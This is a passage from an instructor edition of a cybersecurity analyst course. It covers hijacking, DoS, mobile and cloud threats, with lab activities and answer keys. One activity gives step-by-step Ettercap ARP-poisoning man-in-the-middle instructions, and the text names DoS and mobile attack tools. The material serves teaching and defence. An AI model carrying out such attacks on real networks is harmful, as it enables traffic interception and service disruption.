• DroidSheep
• CookieMonster

ACTIVITY 4-4
Assessing the Impact of Hijacking and
e
Before You Begin
ut
You'll be using Ettercap, a network security tool, to launch an ARP poisoning attack from Kali
Linux. You'll also be working with your Windows 10 client.
ib
Impact of Hijacking and Scenario
You have been getting numerous complaints from people connected to Develetech's guest wireless
tr
network today complaining of timeouts and slow service. You connect your analysis laptop to the
network and find that the performance is unusually bad. You'll investigate further by viewing your
is
ARP cache and monitoring Wireshark for any unusual traffic.
D
1. Display your client's ARP cache.
a) On your Windows 10 client, open a Windows PowerShell administrator prompt and enter arp -a
or
b) Verify that the ARP cache lists other hosts (by IP address) in the local network.
c) If your Kali Linux host is not listed, ping it, then reenter arp -a
e
at
lic
up
D
d) View the MAC address associated with each IP address. Notice each IP address has a different
MAC address, as expected.
e) Take note of your Kali Linux VM's MAC address.
ot
2. Simulate a man-in-the-middle ARP poisoning attack.

a) Switch to your Kali Linux VM.
N
b) Open a terminal and enter sudo ettercap -G to open Ettercap in GUI mode.
o
D

c) In the ettercap 0.8.3.1 window, from the menu, select Options→Set Netmask.
e
ut
ib
d) In the ettercap Input dialog box, in the Netmask field, type 255.255.255.0 and select OK.
e) Verify the sniffing settings are as follows:
tr
is
D
or
e
at
f) Select Accept.
lic
up
g) From the menu, select Options→Hosts→Scan for hosts.

h) When Ettercap finishes scanning for hosts, select Options→Hosts→Hosts list.
i) Verify that your router and hosts appear in the list, including your own client and server.
D
ot
N
o
D
j) Select your Windows 10 client from the host list, and then select Add to Target 1. Remember to help
k) Select your Windows Server 2019 server from the host list, and then select Add to Target 2. students with their IP
This selects the targets that your attack will step in the middle of as traffic is sent from one to the addresses, if necessary.
other.

l) From the menu, select MITM menu→ARP poisoning.
e
ut
ib
tr
is
D
m) In the MITM Attack: ARP Poisoning dialog box, verify that the Sniff remote connections check box is
checked and select OK.
or
e
at
lic
up
n) In the bottom pane, verify that Ettercap is currently sniffing for traffic between these hosts.
D
ot
N
3. Communicate between client and server and view your ARP cache again.
a) Switch back to your Windows 10 client and return to a Windows PowerShell prompt.
o
b) At the prompt, ping your server.

D
c) At the prompt, enter arp -a to view your ARP cache.

d) Verify that the IP address entries for your server and the Kali Linux machine are pointing to the
same exact MAC address.
e
ut
ib
4. Confirm the spoofing attack in Wireshark.
tr
a) In your Kali Linux VM, open another terminal and enter wireshark
b) Once Wireshark opens, double-click the eth0 interface to begin capturing packets. Wireshark on the
is
c) In the Apply a display filter text box, enter arp to filter by ARP packets. Windows 10 host may
d) Switch to your Windows 10 client and ping both your server and your Kali Linux VM. not be able to capture
packets that go from the
D
e) Return to Wireshark in Kali Linux and stop the capture.
host to the VM and vice
f) Verify that ARP is telling your client that the one MAC address for your Kali Linux VM is associated versa. That's why
with both your Kali Linux IP address and your Windows Server IP address. students are using
or Wireshark in the Kali

Linux VM to capture the
packets.
e
at
lic
up
D
ot
N
Note: Remember that you can use the middle pane to learn more information
about a packet. For example, you can confirm the source and destination IP
o
address of each packet.

D
5. What is the value to an attacker in doing this?

A: The attacker could use the corrupted ARP caches to set up a man-in-the-middle attack where they
capture traffic between each of the workstations and the router (and maybe alter that traffic, if it is
unencrypted). They could also use this attack to create a DoS condition.

6. How would you defend against this type of attack?

A: Answers will vary, as there are several mitigation techniques available. A concrete but difficult to
manage technique is to write the ARP tables manually and keep them static. For example, you
can add only workstations that use a particular file server to the table. Subnetting can also reduce
the effectiveness of ARP poisoning, as such an attack won't be routed to different subnets. An IDS
can also alert security personnel to suspicious ARP traffic, if configured properly. Port security,
DHCP snooping, and dynamic ARP inspection can work together to effectively identify and block
invalid MAC address entries.
e
7. Clean up the Kali Linux workspace.
a) Close Wireshark without saving.
ut
b) In Ettercap, select Stop MITM.
ib
tr
c) Close Ettercap.
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC E
Assess the Impact of DoS Incidents
Throughout this lesson, you've seen how different types of attacks can lead to a denial of service. In
this topic, you'll dive deeper into the nature of DoS attacks and how attackers initiate them.
e
Denial of Service (DoS) Attack
ut
A denial of service (DoS) attack is a type of attack in which an attacker attempts to disrupt or Denial of Service (DoS)
disable systems that provide network or application services by various means, including: Attack
ib
• Flooding a network link with data to consume all available bandwidth. Example CVE IDs:
CVE-2016-5126 and
• Sending data designed to exploit known flaws in an application. CVE-2016-4454.
tr
• Sending multiple service requests to consume a system's resources.
• Flooding a user's email inbox with spam messages, causing the genuine messages to get bounced
is
back to the sender.
D
or
e
Figure 4-15: A DoS attack in which excess data floods a server, rendering it inoperable.
at
DoS Attack Techniques

lic
The following table describes some of the different types of DoS attacks. DoS Attack Techniques
You may also wish to
up
DoS Attack Type Description mention SYN floods.

This type of DoS attack
ICMP flood This attack is based on sending high volumes of Internet Control is not as relevant as it
Message Protocol (ICMP) ping packets to a target. Common names for used to be, however.
D
ICMP flood attacks are Smurf attacks and ping floods. Modern systems
and networks are usually well protected against these types of attacks.
ot
UDP flood In this attack, the attacker attempts to overwhelm the target system with
User Datagram Protocol (UDP) ping requests. Often, the source IP
address is spoofed, creating a DoS condition for the spoofed IP.
N
Buffer overflow Many systems and services are vulnerable to a buffer overflow condition,
in which too much data is fed into a fixed-length memory buffer,
resulting in adjacent areas of memory being overwritten. Attackers can
o
exploit buffer overflow vulnerabilities by deliberately invoking buffer

D
overflow conditions, introducing bad data into memory, thus opening the
door for any number of subsequent attack methods or simply causing the
system to cease to function or respond. A buffer overflow can also occur
when there is an excessive amount of incomplete fragmented traffic on a
network. In this case, an attacker may attempt to pass through security
systems or IDSs.
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic E

DoS Attack Type Description

Reflected DoS attack In reflected DoS attacks, a forged source IP address (the target) is used
when sending requests to a large number of computers. This causes those
systems to send a reply to the target system, causing a DoS condition.
One example of a reflected attack is a Network Time Protocol (NTP)
reflected attack. NTP helps hosts on a network keep their clocks
synchronized, and an attacker can send a small query to an NTP server
that returns a much larger response that includes data from the last 600
e
machines the server has communicated with. The size disparity between
the query and the response makes it easier for an attacker to flood their
ut
target with traffic, because the bandwidth they expend is much less than
the bandwidth that results.
ib
A similar technique is used in a DNS amplification attack, in which a
small query to a DNS server returns a reply up to eight times larger.
Reflection attacks can also target the Memcached service, which caches
tr
data in memory to reduce the amount of calls to databases and other
sources of data. Poorly configured Memcached servers are exposed to the
is
Internet and support UDP traffic, which does not require authentication.
The amplification factor of such traffic is greater than 50,000.
D
Resource exhaustion Resource exhaustion is a type of DoS vulnerability that occurs when an
application does not properly restrict access to requested or needed
resources. If an attacker is able to consume enough of an important
Permanent DoS
or
resource, such as network bandwidth or CPU time, the application will no
longer be able to perform its normal operations and may crash.
Permanent DoS attacks, also called phlashing, target the actual hardware
e
attack of a system to cause a service outage the victim can't easily recover from.
With a successful attack, phlashing forces the victim to repair or replace
at
the hardware that runs the system. Taking advantage of remote

administration, the attacker may be able to push corrupted firmware onto
lic
the hardware, causing that equipment to "brick," or become completely

inoperable.
up
Packet Generators
The previous network packet–based attack techniques are typically amplified by tools called packet
generators. Packet generators enable the attacker to craft custom network packets to carry out
specific DoS attacks or target specific services. This automates the process of sending large amounts
D
of malicious or malformed packets.

ot
Botnets and DDoS

Botnets and DDoS A botnet is a set of computers that has been infected by a control program (called a controller) that
N
Example CAPEC ID: enables attackers to collectively exploit those computers to mount attacks. Typically, attackers use
CAPEC-125. botnets to coordinate DoS attacks, send spam email, extract personal information or passwords, and
mine for cryptocurrency. Users of these infected machines (called bots, zombies, or drones) are
o
often unaware their computers are being used for nefarious purposes.
D
DoS operations that use botnets are typically classified as distributed denial of service (DDoS)
attacks. A DDoS is a type of DoS attack that uses multiple computers on disparate networks to
launch the attack from many simultaneous sources. DDoS attacks are often much more devastating
to systems than typical DoS attacks, as even the largest and most well-defended networks can be
overwhelmed by the sheer volume and distribution of malicious traffic.

e
ut
ib
tr
is
D
or
Figure 4-16: A DDoS attack in which zombie computers in a botnet flood a server with data,
rendering it inoperable.
e
at
Mitigation
Mitigating DDoS attacks can be difficult without a great deal of bandwidth and network
redundancies. Even the largest and most well-equipped organizations cannot fully stop such attacks.
lic
However, there are some tactics that can help lessen the impact of a DDoS attack:
• Contact your ISP to see if they offer DDoS protection services. These services are also offered
up
by organizations that specialize in DDoS defense, the most popular of which is Cloudflare.
• Implement network perimeter defenses such as timing out half-open connections and lowering
the threshold at which the network drops traffic on certain protocols like ICMP. These tactics
will only slow the attack, not stop it completely.
D
• Have a backup plan in place in case critical services go down.

ot
How Attackers Evade DDoS Countermeasures

DDoS attacks are incredibly difficult to prevent, especially when botnets are involved. Hackers have How Attackers Evade
N
become so successful at turning random Internet-connected devices into zombie computers that DDoS Countermeasures
compiling and maintaining a botnet has become a serious operation. In fact, many such operations
offer the services of their botnet to anyone willing to pay. In many cases, these prices are modest,
o
making them much more accessible. Someone with a grievance and a target can rent the botnet
without even needing any technical knowledge.
D
While load balancers and IP address filters offer rudimentary protection against a DDoS attack, the
large and distributed nature of a botnet can easily overwhelm a hardened system. Even organizations
with massive resources are susceptible to a service outage caused by a botnet, because it's incredibly
difficult to separate legitimate traffic from the malicious traffic.
Likewise, attackers can evade DDoS defenses by generating traffic in a completely legitimate and
organic manner, without even needing a botnet. Popular social media sites like Reddit and Twitter

have caused many websites to crash when someone submits a link to that site. This is called the
Slashdot effect or slashdotting, named after a social news site popular in the mid-2000s. Thousands
—and even millions—of users all flock to the website at once, which the servers can't handle. In
most cases, the person who submitted the link had no malicious intent, but a clever attacker can use
this as a cover for initiating a DDoS condition.
DoS Tools
DoS Tools The following are examples of popular tools attackers may use to initiate DoS or DDoS attacks:
e
• High Orbit Ion Cannon (HOIC)
ut
• Low Orbit Ion Cannon (LOIC)
• XOIC
ib
• OWASP HTTP Post Tool
• DDOSIM
• R-U-Dead-Yet (RUDY)
tr
• Slowloris
• PyLoris
is
• Tor's Hammer
• HTTP Unbearable Load King (HULK)
D
Note: For more information about DoS controls, visit https://www.cisco.com/c/en/us/
about/security-center/guide-ddos-defense.html.
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 4-5
Assessing the Impact of DDoS Incidents
Data File
e
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments
\DDOS_Attack.pcap
ut
Before You Begin Impact of DDoS
ib
Incidents
You'll use your Windows 10 client in this activity.
Scenario
tr
You get a frantic call from the Develetech web administrator telling you the site has been down
is
more than an hour, although the server itself is up and seems to be working. You see the flashing of
the switch lights and realize your server is receiving massive amounts of traffic. You plug your
analysis laptop into the switch and capture the traffic hitting the web server at 209.73.12.194. You
D
want to see if there is a pattern of DDoS activity currently hitting the web, so you'll do some
research to that effect. Detecting or not detecting a pattern could indicate the severity of the attack
on your systems.
1.
or
Examine the DDOS_Attack.pcap file containing your captured traffic of the
e
attack on your server.
at
a) On your Windows 10 client, open Wireshark.

b) In Wireshark, open DDOS_Attack.pcap from the course data files.
c) Select Statistics→Conversations.
lic
d) Select the IPv4 tab.

up
D
ot
N
o
D

e) Note the wide variety of IP addresses and the number of packets coming from each.
e
ut
ib
tr
is
D
This is not an actual
DDoS attack but a
simulation of one with
random addresses, so it
2. or
Is there any pattern to the attacking IP addresses?
A: No, they seem to be completely random, though there are some with numbers close together.
e
is not completely
realistic. More advanced 3. Select the TCP tab.
at
students may realize

this. What port number are the attackers targeting?
lic
A: Port 80 (HTTP), to take down a web server.
4. Close Wireshark.
up
5. Investigate DDoS attacks currently underway.

a) In your web browser, navigate to www.digitalattackmap.com.
D
Some other sites you

may want to
demonstrate are https://
ot
isitdownrightnow.com
and http://
downrightnow.com.
N
o
D

b) Hover over the various attacks to display statistics about them.
e
ut
ib
tr
is
c) Scroll down the page to see more resources concerning DDoS attacks.
d) Navigate to www.downinspector.com.
D
e) In the URL text box, enter a website such as twitter.com or facebook.com
f) Now check google.com and amazon.com
g) If the site is down, note the statistics on how often and how long it has been down. If the site is up,
6.
note any recent outages in the past.
Why do you think some sites go down less than others?

or
e
A: Answers may vary, but larger Internet companies like Google and Amazon have massive Internet
connection bandwidth and lots of redundancy so they can absorb a DDoS attack and still stay
at
online. Others either cannot afford to or do not choose to spend the money to do that.
7. How can you defend an organization against DDoS attacks?

lic
A: Answers may vary, but it is very difficult without simply buying lots of extra bandwidth and/or
redundant Internet connections. You may be able to consult with your ISP if it offers some sort of
DDoS protection services. You can also attempt to delay, but not fully stop, an attack by
up
incorporating network perimeter defenses like timing out half-open connections and lowering the
thresholds at which to drop certain traffic like ICMP. Ultimately, it's important to have a plan in
place in case you need to escalate your mitigation efforts to a specialist or other third party.
D
ot
N
o
D

TOPIC F
Assess the Impact of Threats to Mobile Security
In this topic, you'll take a look at how attackers target mobile devices and what sort of impact this
can have on the organization.
e
Trends in Mobile Security
ut
Trends in Mobile In many ways, mobile devices are beginning to replace traditional desktop platforms as the way in
Security which employees work. This is especially true of disciplines that require constant communication, as
ib
well as ones that involve the quick viewing of data and information. As user habits change, so too
must the organization's infrastructure. One direct consequence of the increase in mobile device
usage is the increased need for wireless infrastructure.
tr
Similarly, bring your own device (BYOD) is a phenomenon in the office workplace, and one of the
is
most significant trends in the world of mobile computing. Since mobile devices are now so integral
to everyday life, it is inevitable that employees will bring their own to supplement the devices
provided to them by their employers. Unsurprisingly, this practice introduces a whole host of
D
security issues and legal concerns into a corporate environment. Since an employee's personal
property is out of the employer's control, it is difficult to account for every risk, threat, and
vulnerability involved with these devices. Some companies have elected to outright ban BYOD to
or
prevent such security incidents; however, for a number of reasons, this isn't always feasible.
Note: Some organizations attempt to circumvent or at least offer an alternative to BYOD by
provisioning employees with phones that the organization has ultimate ownership over.
e
at
Wireless Threats
lic
Wireless Threats There are various threats to the organization's wireless network that attackers can exploit. One of
Example CVE IDs: the most direct is attempting to crack a private wireless signal. These attacks are launched in much
CVE-2017-13077, the same way as a typical online password attack: trying to brute force or run down a wordlist in
up
CVE-2017-13078, multiple attempts to log in to the network. Networks that don't implement lockout after a number
CVE-2017-13079, and of failed attempts are particularly vulnerable, not to mention those that use weak passwords or
CVE-2017-13080. outdated encryption.
Even routers that implement WPA2 can be vulnerable. In 2017, security researchers revealed a key
D
reinstallation vulnerability in the WPA2 standard—called KRACK—that enables attackers to

decrypt TCP packets and inject malicious code into unencrypted HTTP requests. This is possible
because of the way that the four-way handshake in WPA2 negotiation works. In the third step of the
ot
handshake, the access point sends the shared encryption key to the client, which installs it. To
address the possibility of dropped connections, the WPA2 protocol is designed to resend this key in
N
case the client does not respond. Every time the key is resent, the client reinstalls the key, and the
incremental transmit packet number (the nonce) is reset. An attacker who forces this reset can
launch a replay attack on messages that have already been encrypted using this same nonce value.
o
The attacker can therefore derive the keystream from messages with known contents that use this
nonce value. Because this is a weakness in the standard itself, all unpatched implementations are
D
vulnerable.
As mentioned before, the organization's wireless infrastructure is also at risk if it doesn't adapt.
Attackers are eager to shut down wireless networks that can't handle a certain amount of traffic load
because of poor logical and physical configurations. Likewise, a wireless network that leaks its signal
into areas outside the organization's premises is ripe for war driving attacks. Attackers will attempt
to identify weak points in the wireless network during their reconnaissance phase; when it comes
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic F

time to attack, they'll be able to focus their efforts on the most vulnerable points in the
infrastructure, increasing their effectiveness.
Attackers also frequently target wireless network clients, as they are so numerous and difficult for
security professionals to completely control. Anyone with access to the encryption key can connect
to the network automatically, and if an attacker is able to physically compromise the device, they can
use it as a vector for a much more wide-reaching assault on the network.
FragAttacks
e
Another example of threats that exploit vulnerabilities in the design of Wi-Fi are FragAttacks.
Information on these attacks was published in 2021. FragAttacks take advantage of one of three
ut
flaws:
• A flaw in the aggregation flag of a Wi-Fi frame that enables an attacker to modify this flag data
ib
with malicious data. This is called an aggregation attack.
• A flaw in the frame fragmentation feature that enables an attacker to reassemble frame fragments
that were decrypted using different keys. This is called a mixed key attack.
tr
• Another flaw in the frame fragmentation feature that enables an attacker to inject a malicious
fragment into an access point's memory cache, so that when a user connects to the network and
is
transmits fragmented frames, those fragments are reassembled along with the malicious
fragment. This is called a fragment cache attack.
D
Threats in BYOD Environments
Threat Description
or
The following table lists various threats introduced in a BYOD environment. Threats in BYOD
Environments
e
De-perimeterization With BYOD, work done while in the office may leave the office after
close of business. This pushes the boundaries farther than the
at
organization can totally manage. Employees who take sensitive data

outside of the perimeter and fail to secure their devices will risk that data
lic
falling into the wrong hands. Likewise, for remote employees, the
concern shifts toward securing the interface that those employees use to
access the network.
up
Unpatched and The mobile devices employees use may be difficult to patch or be running
insecure devices outdated software, which could leave them more vulnerable to attack.
Many mobile devices also lack built-in anti-malware software. Not only
can malware infect that user's device, but it could likewise spread
D
throughout the network when the device connects.

Strained infrastructure The addition of multiple devices may place a strain on the network and
ot
cause it to stop functioning at optimum capacity. This may also lead to a

DoS, whether intentional or not.
Forensic complications Because employees own their devices, subjecting them to forensic
N
procedures in response to an incident may prove difficult or even

impossible. This can compromise the integrity of forensic investigations.
o
Lost or stolen devices Unencrypted data on a phone or tablet is at risk of compromise if that
phone or tablet is lost or stolen.
D
Threats to Specific Mobile Platforms Mobile Platform Threats

Example CVE IDs:
Different mobile operating systems present different approaches to security. The following table CVE-2016-4782,
outlines significant threats that target both the major mobile operating systems. CVE-2016-2462,
CVE-2016-3664, and
CVE-2016-1859.

Mobile Operating Threats

System
Android™ The vast majority of malware targeted at mobile platforms targets

Android. This is due to a number of factors, including:
• Having the largest market share.
• Users running older versions of Android with unpatched
vulnerabilities.
• The open, customizable nature of the operating system.
e
• Usage of third-party apps.
ut
• Rooting of devices, enabling apps to obtain high-level privileges and
hijack the OS and other apps.
ib
Commonly, malware operates on Android devices by forcing the user's
device to initiate premium service text messaging or phone calls. The user
is unaware of this, and is charged fees based on this malicious activity.
tr
The predominant source of these threats is from unofficial application
stores rather than the official Google Play store. However, some malware
is
still makes it to Google Play, like the Judy app variants that infected
millions of devices with a browser hijack used to click on advertisements.
D
iOS® iOS is not impervious to compromise. Malware, in particular, targets
jailbroken devices that remove restrictions, particularly the restriction of
or
only being able to download apps from the official App Store.
For example, the Masque attack infected devices that installed the
malicious app through a third-party source, and the Masque app spoofed
a legitimate app's bundle identifier. This enabled the malicious app to
e
replace the legitimate one, appearing to be genuine while actually stealing
at
the user's credentials or gaining root access to the device.

lic
Mobile Infrastructure Hacking Tools

Mobile Infrastructure The following are examples of popular tools attackers may use to hack into mobile platforms:
Hacking Tools
up
• AnDOSid
• Spooftooph
• DroidBox
D
• APKInspector
• AndroRAT
• Burp Suite
ot
N
o
D

ACTIVITY 4-6
Assessing the Impact of Threats to Mobile
Devices
e
Before You Begin
ut
You'll use your Windows 10 client in this activity.
Scenario
ib
Develetech employees use their own personal mobile devices for work in addition to their main Activity: Assessing the
company-issued laptops. Management has asked you to determine the security implications of this Impact of Threats to
tr
BYOD approach and whether the choice of devices should be restricted. You'll do some research Mobile Devices
on the state of mobile device threats for Android and iOS, the two most popular mobile operating
is
systems. This will help determine what is appropriate in your organization based on your security
needs.
D
1. Investigate security threats to Apple's and Google's mobile platforms.
a) In your web browser, navigate to www.cvedetails.com.
or
b) In the Search box in the upper-right corner of the page, type iphone and press Enter.
e
at
c) Scroll down past the ads and select the Apple Iphone Os : CVE security vulnerabilities link.
lic
d) Select the CVSS Scores Report link at the top of the report.
By default, the scores are shown for the past total year.
e) Examine how these vulnerabilities are scored.
up
f) Open a new tab to www.cvedetails.com, and in the Search box, enter android
g) Select the Google Android : CVE security vulnerabilities link.
h) Select the CVSS Scores Report link at the top of the report.
D
2. Which platform has more known weaknesses?

A: Answers may vary depending on when you check these reports, but when this course was written,
ot
Android had more than twice as many vulnerabilities as iOS. However, iOS vulnerabilities were
more likely to be in the critical score range (9–10). The weighted average CVSS score for iPhone
vulnerabilities was also higher than Android. In past years, the report showed the opposite of
N
these conclusions, which demonstrates that mobile vulnerabilities fluctuate over time.
3. Identify security apps available for Android.

o
a) In your web browser, navigate to https://play.google.com/store.

D
b) In the Search box, type security apps and press Enter.

Ensure students are
selecting Apps from the
content section and not
the navigation menu on
the left side of the page.

c) Select Apps to expand the displayed security apps.
e
ut
ib
tr
is
Consider pointing out
that iOS doesn't offer 4. Why does the Google Play store have so many security apps?
D
many security apps, at
least not to the extent of A: Because it is an open platform, many vendors can sell their apps there. Android's openness may
the Google Play store. also be more attractive to attackers.
5. Identify iOS security concerns. or

a) In the browser, navigate to https://support.apple.com/guide/security.
e
An Apple device is b) In the Search this guide search box, enter iOS
required to access the c) Follow some of the links in the results and look them over briefly.
at
App Store. d) Verify that iOS has controls for code signing, app sandboxing, connection security, boot protection,
and more.
lic
6. What are your recommendations for handling BYOD in Develetech?

A: Answers will vary widely, and may reflect an individual's preconceptions. Android has a wide
up
variety of security apps designed by trusted vendors, but it tends to be a more widely targeted
system. Apple devices may have fewer vulnerabilities, but what vulnerabilities they do have may
be more critical. In today's world, it's not always feasible to impose hard restrictions on the types
of devices that personnel can use, depending on the industry and corporate culture. So, in many
D
cases, the best approach is to accept the risk or try to mitigate the risk using indirect methods like
training personnel on acceptable device usage, implementing a robust access control and
privilege management program across the organization, and so on.
ot
7. Close the web browser.

N
o
D

TOPIC G
Assess the Impact of Threats to Cloud Security
As more organizations are pushing their operations to the cloud, it's vital you understand how
threats could compromise those operations.
e
Cloud Infrastructure Challenges
ut
The main idea behind cloud computing is that you can access and manage your data and Cloud Infrastructure
applications from any computer, anywhere in the world, while the storage method and location are Challenges
ib
hidden or abstracted through virtualization. Because of this, customers of cloud services are
experiencing a decrease in the amount of control they have over their systems and data. Likewise,
threats that would target on-site hosting are now adjusting to target cloud providers.
tr
For example, a single cloud provider may offer services to multiple customers. This gives attackers
is
cause to target the provider, as even a minor breach can net the attacker something of value. In a
traditional infrastructure, an attacker may find intrusions to be much more difficult, as the network
can be isolated from the outside world; however, in a cloud environment, the attacker may simply
D
need to have an Internet connection and not much else to cause a breach. A lack of oversight in the
security procedures of cloud providers can dramatically increase the risk an organization takes.
or
Cloud infrastructures are also unique in that they require specialized application programming
interfaces (APIs) for third parties to interface with the cloud. These APIs can cover everything from
authentication to encryption, and if they aren't secure, attackers can easily take advantage of the
APIs to compromise the link between the customer and provider.
e
The cloud infrastructure is a boon to attackers. The elastic computing power that can be borrowed
at
through the cloud from services such as those provided by Amazon, Microsoft, and Google enable
an attacker to quickly scale their computing capabilities (to run password cracking algorithms or
stage DDoS attacks, for example) and to borrow access to resources in a way that can make their
lic
actions hard to trace. Forensic analysis can be extremely difficult in the cloud environment, since
storage and computing resources are typically virtualized. It may be difficult to pinpoint a single
server or router as the failure point. The data needed to reconstruct the incident may be scattered
up
among many devices within multiple data centers throughout the world.
Furthermore, the attacker might cobble together an attack platform from multiple vendors—such as
using cloud computing capabilities from Amazon, cloud storage from Microsoft®, and routing
communications through Google's Gmail™ service. An attacker might run different components of
D
their attack apparatus on different projects or different platforms to make it more difficult for their
activities to be detected or tracked.
ot
Threats to Virtualized Environments

N
The following table describes some of the threats to virtualized environments often used in cloud Threats to Virtualized
infrastructures. Environments
Example CVE ID:
o
Virtual Threat Description CVE-2014-8891.

D
VM escape In a virtual machine (VM) escape, an attacker executes code in a VM that

enables an application running on the VM to escape and interact directly
with the hypervisor. VM escape could give the attacker access to the
underlying host operating systems and thereby allow access to all other
VMs running on that host machine. This is one of the most serious
threats to virtual security.
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic G

Virtual Threat Description

Privilege elevation In a virtualized environment, an attacker with elevated privileges could
access the host machine and do anything an administrator could do to
both the host machine and the VMs running on that host.
Live VM migration In some situations, you may need to move a VM from one physical host
exploitation to another with no impact to the VM's availability. This is called live VM
migration. Live migration can be exploited by attackers. Hypervisors
without proper authentication and integrity protocols may enable an
e
attacker to migrate VMs to their own machine, or migrate the VMs to a
ut
victim machine, overloading it with a DoS attack.
Data remnants Data remnants (also referred to as data remanence) are leftover
information on a storage medium even after basic attempts have been
ib
made to remove that data. Because VMs are an abstraction of a physical
environment and not the real thing, it is difficult to ensure that data you
tr
delete on the VM will truly sanitize that data from its physical source.
This is similar to the idea that simply emptying an operating system's
is
trash bin will not completely erase the data from the storage drive; an
attacker may still be able to retrieve the remaining bits before they are
overwritten.
D
For VMs, this is primarily a concern during the deprovisioning process, as
every bit of data involved in the virtual instance may not be completely
Threats to Big Data

or
gone from physical storage.
e
Threats to Big Data Big data refers to data collections that are so large and complex they are difficult for traditional
at
database tools to manage. Businesses are often prompted to restructure their existing architecture to
keep up with the demands of big data. This paradigm presents a challenge to security professionals
who must adapt to the massive scope of big data.
lic
The following table lists common threats to big data.
Threat Description
up
Breach of privacy Big data is a solution often used to store great volumes of personal
information. Such a large store of data may make it easier for an attacker
to steal sensitive personal information in one comprehensive attack.
D
Privilege escalation Because big data can represent wide swaths of information, some users
may be able to view data they are not authorized to view. This is
ot
especially true if systems are not in place to restrict how users can view
and edit database entries. Multiple users with unrestricted visibility to data
can threaten its confidentiality.
N
Repudiation The size of big data may make event monitoring difficult or infeasible.
Without proper controls for non-repudiation, an attacker may be able to
o
change data and then plausibly deny having done so.

Forensic complications Accurately securing, collecting, and evaluating big data sets is especially
D
difficult because big data implementations often lack a consistent

structure and have a variety of different sources.

Cloud Infrastructure Hacking Tools

Many of the tools you've been introduced to in this lesson can be used to exploit the nature of cloud Cloud Infrastructure
infrastructure. Everything from DoS utilities to malware distribution tools can both attack and Hacking Tools (2 Slides)
benefit from the cloud. Attacks directed at the cloud are often tailored for distributed virtual
environments. For example, tools that can install evasive and armored malware will likely fare better
than typical malware, as cloud services usually offer some sort of malware detection ability in their
virtual environments. Another example is exploitation tools that target web services and applications
running in the cloud. Organizations often encourage their customers to interact with these services
e
and applications more than they would off the cloud, which makes attacks like SQL injection more
attractive to an attacker. These organizations may also be lulled into a false sense of security in the
ut
cloud, and fail to implement the proper controls against such injection attacks.
Another dimension of cloud attacks involves those attackers actually using the cloud to exploit other
ib
environments. By its very nature, the cloud is a highly distributed, instantly scalable, and powerful
set of resources. This is especially true of major services like Amazon EC2™, Google Compute
Engine™, and Microsoft Azure®, as their hosting abilities are massive. So, an attacker who can
tr
direct this power for their own malicious purposes will find their exploits even more effective than if
they relied on traditional means. Instead of slowly and unreliably infecting individual computers
is
across the world in an effort to create a botnet for DDoSing, an attacker can leverage the computing
power of the cloud to execute this DDoS more efficiently.
D
For example, consider an attacker running an automated script that signs up thousands of accounts
for a free cloud service provider in a very short time. Some providers will detect this behavior, but
other, smaller providers may be poorly equipped to do so. The attacker then creates a control
or
program that is able to direct every single account and its resources toward a single goal:
overwhelming a target with bogus traffic. Instead of coordinating a botnet made of disparate
resources stretched thin, the attacker has used the power of a single cloud service to crash their
target. But a DDoS is just one of the possible attacks that can be launched from an unwitting cloud
e
provider; malware distribution, password cracking, and other types of exploits benefit greatly from
at
virtually unlimited computing power.

lic
up
D
ot
N
o
D
Figure 4-17: An attacker exploiting free cloud services to DDoS a target server.

ACTIVITY 4-7
Assessing the Impact of Threats to Cloud
Infrastructures
e
Scenario
ut
As Develetech investigates replacing several legacy systems within the company, it is considering
migrating to various cloud services and applications. The cybersecurity team is meeting to identify
various types of new threats and challenges the company might face as they migrate to the cloud.
ib
While the team is aware that some risks can be addressed through a service-level agreement (SLA)
with cloud vendors, ultimately the risks are Develetech's, so the team is eager to anticipate any
tr
challenges that a cloud migration will bring.
is
Impact of Threats to
Cloud Infrastructures 1. By migrating from on-premises infrastructure to cloud services, what new
D
security risks or challenges might Develetech be exposed to?
A: Examples include: hijacking of the entire cloud account or service (for example, an attacker cracks
the password for the management console); insecure public APIs through which an attacker can
or
gain access to the company's private resources; a malicious insider at the cloud services firm
looking to harm the company or the cloud services firm; as well as the general risks associated
with moving to any web-based service (DoS, password cracking, man-in-the-middle, etc.). One of
the fundamental principles of most cloud services is leveraging economies of scale by sharing a
e
huge pool of storage and computing resources among many customers. Although there are many
benefits to this approach, it also brings a potential weakness. Any vulnerability in the cloud service
at
that enables a malicious customer of the cloud service to escape their own sandbox may enable
them to access information resources that belong to other companies. While the likelihood of this
risk might be low, its impact can be quite high, including the loss of valuable or sensitive data,
lic
service interruption for clients and the cloud provider, possible loss of reputation, legal and civil
penalties, and compliance violations.
up
2. What new challenges might Develetech experience in regard to performing

forensics?
A: With local infrastructure, forensic investigations can often be accomplished at the physical level
D
with an analysis of content in specific storage media. With the cloud, forensics becomes much
more complex due to the virtual nature of storage and computing resources. For example, some
cloud vendors may distribute a single user's storage across multiple drives, multiple data centers,
or even multiple geographic regions. Establishing a chain of custody becomes difficult or
ot
impossible. As it considers each cloud service it might adopt, Develetech should model various
forensic scenarios to determine if it will be possible to obtain evidence it needs when it needs it. In
some cases, it may be necessary to build forensic capabilities into the design when customizing
N
cloud services or integrating them into your own infrastructure.
3. In what ways can attackers use cloud services as a hacking tool?

o
A: The benefits of cloud services apply to attackers as well as legitimate users. For example,
D
attackers can use the big data and scalable computing tools provided by cloud services to perform
resource-intensive operations such as password cracking or DDoS attacks. Hosting services can
be used as collection points for data collected by attackers or as distribution points for malware.

Summary
In this lesson, you identified various types of threats to your computing and network environments,
such as system hacking attacks, DoS incidents, and impersonation attacks. In addition, you assessed
the impact of threats to your mobile and cloud infrastructures. After identifying the wide variety of
threats, you can then evaluate various strategies and tactics for dealing with such threats.
In your experience, what types of threats has your organization or an
e
use the social
organization you're familiar with encountered? Were there strategies in place to networking tools
deal with them?
ut
provided on the CHOICE
A: Answers will vary. Most organizations have faced a wide variety of threats to their computing and Course screen to follow
network systems. Recent news stories are filled with information security threats, such as identity
ib
theft, malware, and social engineering attacks targeted toward large organizations. Quite often,
strategies for dealing with the threats are developed after the threat has been revealed. and resources to support
tr
continued learning.
Has your organization or an organization you're familiar with ever been the
target of a DoS incident? What was the impact if it was preventable?
is
A: Answers will vary. Although a DoS incident isn't necessarily designed to steal information, it does
